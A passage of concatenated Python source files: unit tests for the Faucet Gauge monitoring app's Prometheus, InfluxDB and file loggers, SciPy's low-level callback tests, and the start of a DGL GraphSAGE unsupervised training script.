port_num, reason, status=0): """ Create an OFPPortStatus message with random values. """ port = parser.OFPPort(port_num, '00:00:00:d0:00:0'+ str(port_num), datapath.ports[port_num].name, 0, status, random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000) ) return parser.OFPPortStatus(datapath, reason, port) def port_stats_msg(datapath): """ Create an OFPPortStatsReply with random values. """ stats = [] sec = random.randint(1, 10000) nsec = random.randint(0, 10000) for port_num in datapath.ports: port_stats = parser.OFPPortStats(port_num, random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), random.randint(0, 10000), sec, nsec ) stats.append(port_stats) return parser.OFPPortStatsReply(datapath, body=stats) def flow_stats_msg(datapath, instructions): """ Create an OFPFlowStatsReply with random values. """ matches = generate_all_matches() flow_stats = parser.OFPFlowStats(random.randint(0, 9), random.randint(1, 10000), random.randint(0, 10000), random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), 0, random.randint(1, 10000), random.randint(1, 10000), random.randint(1, 10000), matches, instructions ) return parser.OFPFlowStatsReply(datapath, body=[flow_stats]) def generate_all_matches(): """ Generate all OpenFlow Extensible Matches (oxm) and return a single OFPMatch with all of these oxms. The value for each oxm is the largest value possible for the data type. For example, the largest number for a 4 bit int is 15. """ matches = dict() for oxm_type in ofproto.oxm_types: if oxm_type.type == type_desc.MacAddr: value = 'ff:ff:ff:ff:ff:ff' elif oxm_type.type == type_desc.IPv4Addr: value = '255.255.255.255' elif oxm_type.type == type_desc.IPv6Addr: value = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff' elif isinstance(oxm_type.type, type_desc.IntDescr): value = 2**oxm_type.type.size - 1 else: continue matches[oxm_type.name] = value return parser.OFPMatch(**matches) def logger_to_ofp(port_stats): """ Translates between the logger stat name and the OpenFlow stat name""" return {'packets_out': port_stats.tx_packets, 'packets_in': port_stats.rx_packets, 'bytes_out': port_stats.tx_bytes, 'bytes_in': port_stats.rx_bytes, 'dropped_out': port_stats.tx_dropped, 'dropped_in': port_stats.rx_dropped, 'errors_out': port_stats.tx_errors, 'errors_in': port_stats.rx_errors } def get_matches(match_dict): """Create a set of match name and value tuples""" return {(entry['OXMTlv']['field'], entry['OXMTlv']['value']) for entry in match_dict} def check_instructions(original_inst, logger_inst, test): """ Check that the original instructions matches the instructions from the logger """ for inst_type, inst in logger_inst[0].items(): test.assertEqual(original_inst[0].__class__.__name__, inst_type) for attr_name, attr_val in inst.items(): original_val = getattr(original_inst[0], attr_name) test.assertEqual(original_val, attr_val) def compare_flow_msg(flow_msg, flow_dict, test): """ Compare the body section of an OFPFlowStatsReply message to a dict representation of it """ for stat_name, stat_val in flow_dict.items(): if stat_name == 'match': match_set = get_matches(stat_val['OFPMatch']['oxm_fields']) test.assertEqual(match_set, set(flow_msg.body[0].match.items())) elif stat_name == 'instructions': check_instructions(flow_msg.body[0].instructions, stat_val, test) else: test.assertEqual(getattr(flow_msg.body[0], stat_name), stat_val) class PretendInflux(QuietHandler): """An HTTP Handler that receives InfluxDB messages.""" def do_POST(self): # pylint: disable=invalid-name """ Write request contents to the HTTP server, if there is an output file to write to. """ if hasattr(self.server, 'output_file'): content_length = int(self.headers['content-length']) data = self.rfile.read(content_length) data = data.decode('utf-8') with open(self.server.output_file, 'w') as log: log.write(data) self.send_response(204) self.end_headers() class GaugePrometheusTests(unittest.TestCase): # pytype: disable=module-attr """Tests the GaugePortStatsPrometheusPoller update method""" prom_client = gauge_prom.GaugePrometheusClient(reg=CollectorRegistry()) def parse_prom_output(self, output): """Parses the port stats from prometheus into a dictionary""" parsed_output = {} for line in output.split('\n'): # discard comments and stats not related to port stats if line.startswith('#') or not line.startswith(gauge_prom.PROM_PORT_PREFIX): continue index = line.find('{') #get the stat name e.g. of_port_rx_bytes and strip 'of_port_' prefix = gauge_prom.PROM_PORT_PREFIX + gauge_prom.PROM_PREFIX_DELIM stat_name = line[0:index].replace(prefix, '') #get the labels within {} labels = line[index + 1:line.find('}')].split(',') for label in labels: lab_name, lab_val = label.split('=', 1) lab_val = lab_val.replace('"', '') if lab_name == 'dp_id': dp_id = int(lab_val, 16) elif lab_name == 'port': port_name = lab_val key = (dp_id, port_name) stat_val = line.split(' ')[-1] if key not in parsed_output: parsed_output[key] = [] parsed_output[key].append((stat_name, float(stat_val))) return parsed_output def get_prometheus_stats(self, addr, port): """Attempts to contact the prometheus server at the address to grab port stats.""" url = 'http://{}:{}'.format(addr, port) session = requests.Session() adapter = requests.adapters.HTTPAdapter(max_retries=10) session.mount('http://', adapter) return session.get(url).text def test_poller(self): """Test the update method to see if it pushes port stats""" datapath = create_mock_datapath(2) conf = mock.Mock(dp=datapath, type='', interval=1, prometheus_port=9303, prometheus_addr='localhost', use_test_thread=True ) prom_poller = gauge_prom.GaugePortStatsPrometheusPoller(conf, '__name__', self.prom_client) prom_poller._running = True msg = port_stats_msg(datapath) prom_poller.update(time.time(), msg) prom_lines = self.get_prometheus_stats(conf.prometheus_addr, conf.prometheus_port) prom_lines = self.parse_prom_output(prom_lines) for port_num, port in datapath.ports.items(): port_stats = msg.body[int(port_num) - 1] stats = prom_lines[(datapath.dp_id, port.name)] stats_found = set() for stat_name, stat_val in stats: self.assertAlmostEqual(stat_val, getattr(port_stats, stat_name)) stats_found.add(stat_name) self.assertEqual(stats_found, set(gauge_prom.PROM_PORT_VARS)) def test_port_state(self): """Test the update method to see if it pushes port state""" datapath = create_mock_datapath(2) conf = mock.Mock(dp=datapath, type='', interval=1, prometheus_port=9303, prometheus_addr='localhost', use_test_thread=True ) prom_poller = gauge_prom.GaugePortStatePrometheusPoller(conf, '__name__', self.prom_client) prom_poller._running = True reasons = [ofproto.OFPPR_ADD, ofproto.OFPPR_DELETE, ofproto.OFPPR_MODIFY] for i in range(1, len(conf.dp.ports) + 1): msg = port_state_msg(conf.dp, i, reasons[i-1]) port_name = conf.dp.ports[i].name rcv_time = int(time.time()) prom_poller.update(rcv_time, msg) prom_lines = self.get_prometheus_stats(conf.prometheus_addr, conf.prometheus_port) prom_lines = self.parse_prom_output(prom_lines) stats = prom_lines[(datapath.dp_id, port_name)] stats_found = set() for stat_name, stat_val in stats: msg_data = msg if stat_name == 'reason' else msg.desc self.assertAlmostEqual(stat_val, getattr(msg_data, stat_name)) stats_found.add(stat_name) self.assertEqual(stats_found, set(gauge_prom.PROM_PORT_STATE_VARS)) def test_flow_stats(self): """Check the update method of the GaugeFlowTablePrometheusPoller class""" datapath = create_mock_datapath(2) conf = mock.Mock(dp=datapath, type='', interval=1, prometheus_port=9303, prometheus_addr='localhost', use_test_thread=True ) prom_poller = gauge_prom.GaugeFlowTablePrometheusPoller(conf, '__name__', self.prom_client) rcv_time = int(time.time()) instructions = [parser.OFPInstructionGotoTable(1)] msg = flow_stats_msg(conf.dp, instructions) prom_poller.update(rcv_time, msg) class GaugeInfluxShipperTest(unittest.TestCase): # pytype: disable=module-attr """Tests the InfluxShipper""" def create_config_obj(self, port=12345): """Create a mock config object that contains the necessary InfluxDB config""" conf = mock.Mock(influx_host='localhost', influx_port=port, influx_user='gauge', influx_pwd='', influx_db='gauge', influx_timeout=10 ) return conf def get_values(self, dict_to_unpack): """Get all the values from a nested dictionary""" values = [] for value in dict_to_unpack.values(): if isinstance(value, dict): values.extend(self.get_values(value)) else: values.append(value) return values def test_ship_success(self): """Checks that the shipper successsfully connects to a HTTP server when the points are shipped""" try: server = start_server(PretendInflux) shipper = gauge_influx.InfluxShipper() shipper.conf = self.create_config_obj(server.server_port) points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},] shipper.ship_points(points) except (ConnectionError, ReadTimeout) as err: self.fail("Code threw an exception: {}".format(err)) finally: server.socket.close() server.shutdown() def test_ship_connection_err(self): """Checks that even when there is a connection error, there is no exception thrown""" try: shipper = gauge_influx.InfluxShipper() shipper.conf = self.create_config_obj() shipper.logger = mock.Mock() points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},] shipper.ship_points(points) except (ConnectionError, ReadTimeout) as err: self.fail("Code threw an exception: {}".format(err)) def test_ship_no_config(self): """Check that no exceptions are thrown when there is no config""" try: shipper = gauge_influx.InfluxShipper() points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},] shipper.ship_points(points) except (ConnectionError, ReadTimeout) as err: self.fail("Code threw an exception: {}".format(err)) def test_point(self): """Checks that the points produced still have the variables given to it""" shipper = gauge_influx.InfluxShipper() dp_name = 'faucet-1' port_name = 'port1.0.1' rcv_time = int(time.time()) stat_name = 'test_stat_name' #max uint64 number stat_val = 2**64 - 1 port_point = shipper.make_port_point(dp_name, port_name, rcv_time, stat_name, stat_val) values = {dp_name, port_name, rcv_time, stat_name} port_vals = set(self.get_values(port_point)) port_vals_stat = port_vals.difference(values) self.assertEqual(len(port_vals_stat), 1) self.assertAlmostEqual(port_vals_stat.pop(), stat_val) tags = {'dp_name': dp_name, 'port_name': port_name} point = shipper.make_point(tags, rcv_time, stat_name, stat_val) point_vals = set(self.get_values(point)) point_vals_stat = point_vals.difference(values) self.assertEqual(len(point_vals_stat), 1) self.assertAlmostEqual(point_vals_stat.pop(), stat_val) class GaugeInfluxUpdateTest(unittest.TestCase): # pytype: disable=module-attr """Test the Influx loggers update methods""" server = None def setUp(self): """ Starts up an HTTP server to mock InfluxDB. Also opens a new temp file for the server to write to """ self.server = start_server(PretendInflux) self.temp_fd, self.server.output_file = tempfile.mkstemp() def tearDown(self): """ Close the temp file (which should delete it) and stop the HTTP server """ os.close(self.temp_fd) os.remove(self.server.output_file) self.server.socket.close() self.server.shutdown() def create_config_obj(self, datapath): """Create a mock config object that contains the necessary InfluxDB config""" conf = mock.Mock(influx_host='localhost', influx_port=self.server.server_port, influx_user='gauge', influx_pwd='', influx_db='gauge', influx_timeout=10, interval=5, dp=datapath ) return conf @staticmethod def parse_key_value(dictionary, kv_list): """ When given a list consisting of strings such as: 'key1=val1', add to the dictionary as dictionary['key1'] = 'val1'. Ignore entries in the list which do not contain '=' """ for key_val in kv_list: if '=' in key_val: key, val = key_val.split('=') try: val = float(val) val = int(val) except ValueError: pass dictionary[key] = val def parse_influx_output(self, output_to_parse): """ Parse the output from the mock InfluxDB server The usual layout of the output is: measurement,tag1=val1,tag2=val2 field1=val3 timestamp The tags are separated with a comma and the fields are separated with a space. The measurement always appears first, and the timestamp is always last """ influx_data = dict() tags = output_to_parse.split(',') fields = tags[-1].split(' ') tags[-1] = fields[0] influx_data['timestamp'] = int(fields[-1]) fields = fields[1:-1] self.parse_key_value(influx_data, tags) self.parse_key_value(influx_data, fields) return (tags[0], influx_data) def test_port_state(self): """ Check the update method of the GaugePortStateInfluxDBLogger class""" conf = self.create_config_obj(create_mock_datapath(3)) db_logger = gauge_influx.GaugePortStateInfluxDBLogger(conf, '__name__', mock.Mock()) db_logger._running = True reasons = [ofproto.OFPPR_ADD, ofproto.OFPPR_DELETE, ofproto.OFPPR_MODIFY] for i in range(1, len(conf.dp.ports) + 1): msg = port_state_msg(conf.dp, i, reasons[i-1]) rcv_time = int(time.time()) db_logger.update(rcv_time, msg) with open(self.server.output_file, 'r') as log: output = log.read() influx_data = self.parse_influx_output(output)[1] data = {conf.dp.name, conf.dp.ports[i].name, rcv_time, reasons[i-1]} self.assertEqual(data, set(influx_data.values())) def test_port_stats(self): """Check the update method of the GaugePortStatsInfluxDBLogger class""" conf = self.create_config_obj(create_mock_datapath(2)) db_logger = gauge_influx.GaugePortStatsInfluxDBLogger(conf, '__name__', mock.Mock()) db_logger._running = True msg = port_stats_msg(conf.dp) rcv_time = int(time.time()) db_logger.update(rcv_time, msg) with open(self.server.output_file, 'r') as log: output = log.readlines() for line in output: measurement, influx_data = self.parse_influx_output(line) # get the number at the end of the port_name port_num = influx_data['port_name'] # pytype: disable=unsupported-operands # get the original port stat value port_stat_val = logger_to_ofp( msg.body[port_num - 1])[measurement] # pytype: disable=unsupported-operands self.assertEqual(port_stat_val, influx_data['value']) self.assertEqual(conf.dp.name, influx_data['dp_name']) self.assertEqual(rcv_time, influx_data['timestamp']) def test_flow_stats(self): """Check the update method of the GaugeFlowTableInfluxDBLogger class""" conf = self.create_config_obj(create_mock_datapath(0)) db_logger = gauge_influx.GaugeFlowTableInfluxDBLogger(conf, '__name__', mock.Mock()) db_logger._running = True rcv_time = int(time.time()) instructions = [parser.OFPInstructionGotoTable(1)] msg = flow_stats_msg(conf.dp, instructions) db_logger.update(rcv_time, msg) other_fields = {'dp_name': conf.dp.name, 'dp_id': hex(conf.dp.dp_id), 'timestamp': rcv_time, 'priority': msg.body[0].priority, 'table_id': msg.body[0].table_id, 'inst_count': len(msg.body[0].instructions), 'vlan': msg.body[0].match.get('vlan_vid') ^ ofproto.OFPVID_PRESENT, 'cookie': msg.body[0].cookie, } with open(self.server.output_file, 'r') as log: output = log.readlines() for line in output: measurement, influx_data = self.parse_influx_output(line) for stat_name, stat_val in influx_data.items(): if stat_name == 'value': if measurement == 'flow_packet_count': self.assertEqual(msg.body[0].packet_count, stat_val) elif measurement == 'flow_byte_count': self.assertEqual(msg.body[0].byte_count, stat_val) else: self.fail("Unknown measurement") elif stat_name in other_fields: self.assertEqual(other_fields[stat_name], stat_val) elif stat_name in msg.body[0].match: self.assertEqual(msg.body[0].match.get(stat_name), stat_val) else: self.fail("Unknown key: {} and value: {}".format(stat_name, stat_val)) class GaugeThreadPollerTest(unittest.TestCase): # pytype: disable=module-attr """Tests the methods in the GaugeThreadPoller class""" def setUp(self): """Creates a gauge poller and initialises class variables""" self.interval = 1 conf = mock.Mock(interval=self.interval) self.poller = gauge_pollers.GaugeThreadPoller(conf, '__name__', mock.Mock()) self.send_called = False def fake_send_req(self): """This should be called instead of the send_req method in the GaugeThreadPoller class, which just throws an error""" self.send_called = True def fake_no_response(self): """This should be called instead of the no_response method in the GaugeThreadPoller class, which just throws an error""" return def test_start(self): """ Checks if the poller is started """ self.poller.send_req = self.fake_send_req self.poller.no_response = self.fake_no_response self.poller.start(mock.Mock(), active=True) poller_thread = self.poller.thread hub.sleep(self.interval + 1) self.assertTrue(self.send_called) self.assertFalse(poller_thread.dead) def test_stop(self): """ Check if a poller can be stopped """ self.poller.send_req = self.fake_send_req self.poller.no_response = self.fake_no_response self.poller.start(mock.Mock(), active=True) poller_thread = self.poller.thread self.poller.stop() hub.sleep(self.interval + 1) self.assertFalse(self.send_called) self.assertTrue(poller_thread.dead) def test_active(self): """Check if active reflects the state of the poller """ self.assertFalse(self.poller.is_active()) self.assertFalse(self.poller.running()) self.poller.start(mock.Mock(), active=True) self.assertTrue(self.poller.is_active()) self.assertTrue(self.poller.running()) self.poller.stop() self.assertFalse(self.poller.is_active()) self.assertFalse(self.poller.running()) self.poller.start(mock.Mock(), active=False) self.assertFalse(self.poller.is_active()) self.assertTrue(self.poller.running()) self.poller.stop() self.assertFalse(self.poller.is_active()) self.assertFalse(self.poller.running()) class GaugePollerTest(unittest.TestCase): # pytype: disable=module-attr """Checks the send_req and no_response methods in a Gauge Poller""" def check_send_req(self, poller, msg_class): """Check that the message being sent matches the expected one""" datapath = mock.Mock(ofproto=ofproto, ofproto_parser=parser) poller.start(datapath, active=True) poller.stop() poller.send_req() for method_call in datapath.mock_calls: arg = method_call[1][0] self.assertTrue(isinstance(arg, msg_class)) def check_no_response(self, poller): """Check that no exception occurs when the no_response method is called""" try: poller.no_response() except Exception as err: self.fail("Code threw an exception: {}".format(err)) class GaugePortStatsPollerTest(GaugePollerTest): """Checks the GaugePortStatsPoller class""" def test_send_req(self): """Check that the poller sends a port stats request""" conf = mock.Mock(interval=1) poller = gauge_pollers.GaugePortStatsPoller(conf, '__name__', mock.Mock()) self.check_send_req(poller, parser.OFPPortStatsRequest) def test_no_response(self): """Check that the poller doesnt throw an exception""" poller = gauge_pollers.GaugePortStatsPoller(mock.Mock(), '__name__', mock.Mock()) self.check_no_response(poller) class GaugeFlowTablePollerTest(GaugePollerTest): """Checks the GaugeFlowTablePoller class""" def test_send_req(self): """Check that the poller sends a flow stats request""" conf = mock.Mock(interval=1) poller = gauge_pollers.GaugeFlowTablePoller(conf, '__name__', mock.Mock()) self.check_send_req(poller, parser.OFPFlowStatsRequest) def test_no_response(self): """Check that the poller doesnt throw an exception""" poller = gauge_pollers.GaugeFlowTablePoller(mock.Mock(), '__name__', mock.Mock()) self.check_no_response(poller) class GaugeWatcherTest(unittest.TestCase): # pytype: disable=module-attr """Checks the loggers in watcher.py.""" conf = None temp_path = None tmp_filename = "tmp_filename" def setUp(self): """Creates a temporary file and directory and a mocked conf object""" self.temp_path = tempfile.mkdtemp() self.conf = mock.Mock( file=os.path.join(self.temp_path, self.tmp_filename), path=self.temp_path, compress=False ) def tearDown(self): """Removes the temporary directory and its contents""" shutil.rmtree(self.temp_path) def get_file_contents(self, filename=tmp_filename): """Return the contents of the temporary file and clear it""" filename = os.path.join(self.temp_path, filename) with open(filename, 'r+') as file_: contents = file_.read() file_.seek(0, 0) file_.truncate() return contents def test_port_state(self): """Check the update method in the GaugePortStateLogger class""" reasons = {'unknown' : 5, 'add' : ofproto.OFPPR_ADD, 'delete' : ofproto.OFPPR_DELETE, 'up' : ofproto.OFPPR_MODIFY, 'down' : ofproto.OFPPR_MODIFY } #add an ofproto attribute to the datapath datapath = create_mock_datapath(1) ofp_attr = {'ofproto': ofproto} datapath.configure_mock(**ofp_attr) self.conf.dp = datapath logger = watcher.GaugePortStateLogger(self.conf, '__name__', mock.Mock()) logger._running = True for reason in reasons: state = 0 if reason == 'down': state = ofproto.OFPPS_LINK_DOWN msg = port_state_msg(datapath, 1, reasons[reason], state) logger.update(time.time(), msg) log_str = self.get_file_contents().lower() self.assertTrue(reason in log_str) self.assertTrue(msg.desc.name in log_str or 'port ' + str(msg.desc.port_no) in log_str) hexs = re.findall(r'0x[0-9A-Fa-f]+', log_str) hexs = [int(num, 16) for num in hexs] self.assertTrue(datapath.dp_id in hexs or str(datapath.dp_id) in log_str) def test_port_stats(self): """Check the update method in the GaugePortStatsLogger class""" #add an ofproto attribute to the datapath datapath = create_mock_datapath(2) ofp_attr = {'ofproto': ofproto} datapath.configure_mock(**ofp_attr) #add the datapath as an attribute to the config dp_attr = {'dp' : datapath} self.conf.configure_mock(**dp_attr) logger = watcher.GaugePortStatsLogger(self.conf, '__name__', mock.Mock()) logger._running = True msg = port_stats_msg(datapath) original_stats = [] for i in range(0, len(msg.body)): original_stats.append(logger_to_ofp(msg.body[i])) logger.update(time.time(), msg) log_str = self.get_file_contents() for stat_name in original_stats[0]: stat_name = stat_name.split("_") #grab any lines that mention the stat_name pattern = r'^.*{}.{}.*$'.format(stat_name[0], stat_name[1]) stats_list = re.findall(pattern, log_str, re.MULTILINE) for line in stats_list: self.assertTrue(datapath.name in line) #grab the port number (only works for single digit port nums) index = line.find('port') port_num = int(line[index + 4]) # grab the number at the end of the line last_n = re.search(r'(\d+)$', line) assert last_n val = int(last_n.group()) logger_stat_name = '_'.join((stat_name[0], stat_name[1])) original_val = original_stats[port_num - 1][logger_stat_name] self.assertEqual(original_val, val) def test_flow_stats(self): """Check the update method in the GaugeFlowStatsLogger class""" #add an ofproto attribute to the datapath datapath = create_mock_datapath(0) ofp_attr = {'ofproto': ofproto} datapath.configure_mock(**ofp_attr) #add the datapath as an attribute to the config dp_attr = {'dp' : datapath} self.conf.configure_mock(**dp_attr) logger = watcher.GaugeFlowTableLogger(self.conf, '__name__', mock.Mock()) logger._running = True instructions = [parser.OFPInstructionGotoTable(1)] msg = flow_stats_msg(datapath, instructions) rcv_time = time.time() rcv_time_str = logger._rcv_time(rcv_time) logger.update(rcv_time, msg) log_str = self.get_file_contents( "{}--flowtable--{}.json".format(datapath.name, rcv_time_str) ) yaml_dict = yaml.safe_load(log_str)['OFPFlowStatsReply']['body'][0]['OFPFlowStats'] compare_flow_msg(msg, yaml_dict, self) class RyuAppSmokeTest(unittest.TestCase): # pytype: disable=module-attr """Test Gauge Ryu app.""" def setUp(self): self.tmpdir = tempfile.mkdtemp() os.environ['GAUGE_LOG'] = os.path.join(self.tmpdir, 'gauge.log') os.environ['GAUGE_EXCEPTION_LOG'] = os.path.join(self.tmpdir, 'gauge-exception.log') self.ryu_app = None def tearDown(self): valve_util.close_logger(self.ryu_app.logger) valve_util.close_logger(self.ryu_app.exc_logger) shutil.rmtree(self.tmpdir) @staticmethod def _fake_dp(): datapath = namedtuple('datapath', ['id', 'close'])(0, lambda: None) return datapath def _fake_event(self): datapath = self._fake_dp() msg = namedtuple('msg', ['datapath'])(datapath) event = EventOFPMsgBase(msg=msg) event.dp = msg.datapath return event def _write_config(self, config_file_name, config): with open(config_file_name, 'w') as config_file: config_file.write(config) def test_gauge(self): """Test Gauge can be initialized.""" os.environ['GAUGE_CONFIG'] = '/dev/null' self.ryu_app = gauge.Gauge( dpset={}, reg=CollectorRegistry()) self.ryu_app.reload_config(None) self.assertFalse(self.ryu_app._config_files_changed()) self.ryu_app._update_watcher(None, self._fake_event()) self.ryu_app._start_watchers(self._fake_dp(), {}, time.time()) for event_handler in ( self.ryu_app._datapath_connect, self.ryu_app._datapath_disconnect): event_handler(self._fake_event()) def test_gauge_config(self): """Test Gauge minimal config.""" faucet_conf1 = """ vlans: 100: description: "100" dps: dp1: dp_id: 0x1 interfaces: 1: description: "1" native_vlan: 100 """ faucet_conf2 = """ vlans: 100: description: "200" dps: dp1: dp_id: 0x1 interfaces: 2: description: "2" native_vlan: 100 """ os.environ['FAUCET_CONFIG'] = os.path.join(self.tmpdir, 'faucet.yaml') self._write_config(os.environ['FAUCET_CONFIG'], faucet_conf1) os.environ['GAUGE_CONFIG'] = os.path.join(self.tmpdir, 'gauge.yaml') gauge_conf = """ faucet_configs: - '%s' watchers: port_status_poller: type: 'port_state' all_dps: True db: 'prometheus' port_stats_poller: type: 'port_stats' all_dps: True interval: 10 db: 'prometheus' flow_table_poller: type: 'flow_table' all_dps: True interval: 60 db: 'prometheus' dbs: prometheus: type: 'prometheus' prometheus_addr: '0.0.0.0' prometheus_port: 0 """ % os.environ['FAUCET_CONFIG'] self._write_config(os.environ['GAUGE_CONFIG'], gauge_conf) self.ryu_app = gauge.Gauge( dpset={}, reg=CollectorRegistry()) self.ryu_app.reload_config(None) self.assertFalse(self.ryu_app._config_files_changed()) self.assertTrue(self.ryu_app.watchers) self.ryu_app.reload_config(None) self.assertTrue(self.ryu_app.watchers) self.assertFalse(self.ryu_app._config_files_changed()) # Load a new FAUCET config. self._write_config(os.environ['FAUCET_CONFIG'], faucet_conf2) self.assertTrue(self.ryu_app._config_files_changed()) self.ryu_app.reload_config(None) self.assertTrue(self.ryu_app.watchers) self.assertFalse(self.ryu_app._config_files_changed()) # Load an invalid Gauge config self._write_config(os.environ['GAUGE_CONFIG'], 'invalid') self.assertTrue(self.ryu_app._config_files_changed()) self.ryu_app.reload_config(None) self.assertTrue(self.ryu_app.watchers) # Keep trying to load a valid version. self.assertTrue(self.ryu_app._config_files_changed()) # Load good Gauge config back self._write_config(os.environ['GAUGE_CONFIG'], gauge_conf) self.assertTrue(self.ryu_app._config_files_changed()) self.ryu_app.reload_config(None) self.assertTrue(self.ryu_app.watchers) self.assertFalse(self.ryu_app._config_files_changed()) if __name__ == "__main__": unittest.main() # pytype: disable=module-attr
test_ccallback.py
from __future__ import division, print_function, absolute_import from numpy.testing import assert_equal, assert_raises, assert_ import time import nose import ctypes import threading from scipy._lib import _ccallback_c as _test_ccallback_cython from scipy._lib import _test_ccallback from scipy._lib._ccallback import LowLevelCallable try: import cffi HAVE_CFFI = True except ImportError: HAVE_CFFI = False ERROR_VALUE = 2.0 def callback_python(a, user_data=None): if a == ERROR_VALUE: raise ValueError("bad value") if user_data is None: return a + 1 else: return a + user_data def _get_cffi_func(base, signature): if not HAVE_CFFI: raise nose.SkipTest("cffi not installed") # Get function address voidp = ctypes.cast(base, ctypes.c_void_p) address = voidp.value # Create corresponding cffi handle ffi = cffi.FFI() func = ffi.cast(signature, address) return func def _get_ctypes_data(): value = ctypes.c_double(2.0) return ctypes.cast(ctypes.pointer(value), ctypes.c_voidp) def _get_cffi_data(): if not HAVE_CFFI: raise nose.SkipTest("cffi not installed") ffi = cffi.FFI() return ffi.new('double *', 2.0) CALLERS = { 'simple': _test_ccallback.test_call_simple, 'nodata': _test_ccallback.test_call_nodata, 'nonlocal': _test_ccallback.test_call_nonlocal, 'cython': _test_ccallback_cython.test_call_cython, } # These functions have signatures known to the callers FUNCS = { 'python': lambda: callback_python, 'capsule': lambda: _test_ccallback.test_get_plus1_capsule(), 'cython': lambda: LowLevelCallable.from_cython(_test_ccallback_cython, "plus1_cython"), 'ctypes': lambda: _test_ccallback_cython.plus1_ctypes, 'cffi': lambda: _get_cffi_func(_test_ccallback_cython.plus1_ctypes, 'double (*)(double, int *, void *)'), 'capsule_b': lambda: _test_ccallback.test_get_plus1b_capsule(), 'cython_b': lambda: LowLevelCallable.from_cython(_test_ccallback_cython, "plus1b_cython"), 'ctypes_b': lambda: _test_ccallback_cython.plus1b_ctypes, 'cffi_b': lambda: _get_cffi_func(_test_ccallback_cython.plus1b_ctypes, 'double (*)(double, double, int *, void *)'), } # These functions have signatures the callers don't know BAD_FUNCS = { 'capsule_bc': lambda: _test_ccallback.test_get_plus1bc_capsule(), 'cython_bc': lambda: LowLevelCallable.from_cython(_test_ccallback_cython, "plus1bc_cython"), 'ctypes_bc': lambda: _test_ccallback_cython.plus1bc_ctypes, 'cffi_bc': lambda: _get_cffi_func(_test_ccallback_cython.plus1bc_ctypes, 'double (*)(double, double, double, int *, void *)'), } USER_DATAS = { 'ctypes': _get_ctypes_data, 'cffi': _get_cffi_data, 'capsule': _test_ccallback.test_get_data_capsule, } def test_callbacks(): def check(caller, func, user_data): caller = CALLERS[caller] func = FUNCS[func]() user_data = USER_DATAS[user_data]() if func is callback_python: func2 = lambda x: func(x, 2.0) else: func2 = LowLevelCallable(func, user_data) func = LowLevelCallable(func) # Test basic call assert_equal(caller(func, 1.0), 2.0) # Test 'bad' value resulting to an error assert_raises(ValueError, caller, func, ERROR_VALUE) # Test passing in user_data assert_equal(caller(func2, 1.0), 3.0) for caller in sorted(CALLERS.keys()): for func in sorted(FUNCS.keys()): for user_data in sorted(USER_DATAS.keys()): yield check, caller, func, user_data def test_bad_callbacks(): def check(caller, func, user_data): caller = CALLERS[caller] user_data = USER_DATAS[user_data]() func = BAD_FUNCS[func]() if func is callback_python: func2 = lambda x: func(x, 2.0) else: func2 = LowLevelCallable(func, user_data) func = LowLevelCallable(func) # Test that basic call fails assert_raises(ValueError, caller, LowLevelCallable(func), 1.0) # Test that passing in user_data also fails assert_raises(ValueError, caller, func2, 1.0) # Test error message llfunc = LowLevelCallable(func) try: caller(llfunc, 1.0) except ValueError as err: msg = str(err) assert_(llfunc.signature in msg, msg) assert_('double (double, double, int *, void *)' in msg, msg) for caller in sorted(CALLERS.keys()): for func in sorted(BAD_FUNCS.keys()): for user_data in sorted(USER_DATAS.keys()): yield check, caller, func, user_data def test_signature_override(): caller = _test_ccallback.test_call_simple func = _test_ccallback.test_get_plus1_capsule() llcallable = LowLevelCallable(func, signature="bad signature") assert_equal(llcallable.signature, "bad signature") assert_raises(ValueError, caller, llcallable, 3) llcallable = LowLevelCallable(func, signature="double (double, int *, void *)") assert_equal(llcallable.signature, "double (double, int *, void *)") assert_equal(caller(llcallable, 3), 4) def test_threadsafety(): def callback(a, caller): if a <= 0: return 1 else: res = caller(lambda x: callback(x, caller), a - 1) return 2*res def check(caller): caller = CALLERS[caller] results = [] count = 10 def run(): time.sleep(0.01) r = caller(lambda x: callback(x, caller), count) results.append(r) threads = [threading.Thread(target=run) for j in range(20)] for thread in threads: thread.start() for thread in threads: thread.join() assert_equal(results, [2.0**count]*len(threads)) for caller in CALLERS.keys(): yield check, caller
train_sampling_unsupervised.py
import dgl import numpy as np import torch as th import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torch.multiprocessing as mp import dgl.function as fn import dgl.nn.pytorch as dglnn import time import argparse from dgl.data import RedditDataset from torch.nn.parallel import DistributedDataParallel import tqdm import sklearn.linear_model as lm import sklearn.metrics as skm from utils import thread_wrapped_func class NegativeSampler(object): def __init__(self, g, k, neg_share=False): self.weights = g.in_degrees().float() ** 0.75 self.k = k self.neg_share = neg_share def __call__(self, g, eids): src, _ = g.find_edges(eids) n = len(src) if self.neg_share and n % self.k == 0: dst = self.weights.multinomial(n, replacement=True) dst = dst.view(-1, 1, self.k).expand(-1, self.k, -1).flatten() else: dst = self.weights.multinomial(n*self.k, replacement=True) src = src.repeat_interleave(self.k) return src, dst class SAGE(nn.Module): def __init__(self, in_feats, n_hidden, n_classes, n_layers, activation, dropout): super().__init__() self.n_layers = n_layers self.n_hidden = n_hidden self.n_classes = n_classes self.layers = nn.ModuleList() self.layers.append(dglnn.SAGEConv(in_feats, n_hidden, 'mean')) for i in range(1, n_layers - 1): self.layers.append(dglnn.SAGEConv(n_hidden, n_hidden, 'mean')) self.layers.append(dglnn.SAGEConv(n_hidden, n_classes, 'mean')) self.dropout = nn.Dropout(dropout) self.activation = activation def forward(self, blocks, x): h = x for l, (layer, block) in enumerate(zip(self.layers, blocks)): h = layer(block, h) if l != len(self.layers) - 1: h = self.activation(h) h = self.dropout(h) return h def inference(self, g, x, device): """ Inference with the GraphSAGE model on full neighbors (i.e. without neighbor sampling). g : the entire graph. x : the input of entire node set. The inference code is written in a fashion that it could handle any number of nodes and layers. """ # During inference with sampling, multi-layer blocks are very inefficient because # lots of computations in the first few layers are repeated. # Therefore, we compute the 